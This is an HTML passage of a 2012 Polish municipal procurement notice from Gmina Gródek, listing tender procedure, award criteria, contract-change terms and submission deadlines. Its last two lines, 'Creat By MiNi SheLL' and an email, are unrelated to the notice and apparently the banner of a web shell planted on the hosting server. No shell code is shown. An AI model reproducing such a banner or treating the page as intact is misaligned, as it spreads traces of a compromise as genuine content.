<p>1) Formularz oferty, 2) Oświadczenie o laboratorium załącznik nr 2.6 do SIWZ; 3) Oświadczenie o oznakowaniu załącznik nr 2.7. do SIWZ; 3) Pełnomocnictwo; 4) Kosztorysy ślepe; 5) Zobowiązanie do oddania do dyspozycji zasobów innych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożnością dotrzymania terminu zakończenia robót, termin ten może ulec przedłużeniu, nie więcej jednak, niż o czas trwania tych okoliczności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.grodek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gródek, ul. A. i G. Chodkiewiczów 2, 16-040 Gródek, pokój nr 6..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2012 godzina 09:00, miejsce: Urząd Gminy Gródek, ul. A. i G. Chodkiewiczów 2, 16-040 Gródek, pokój nr 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com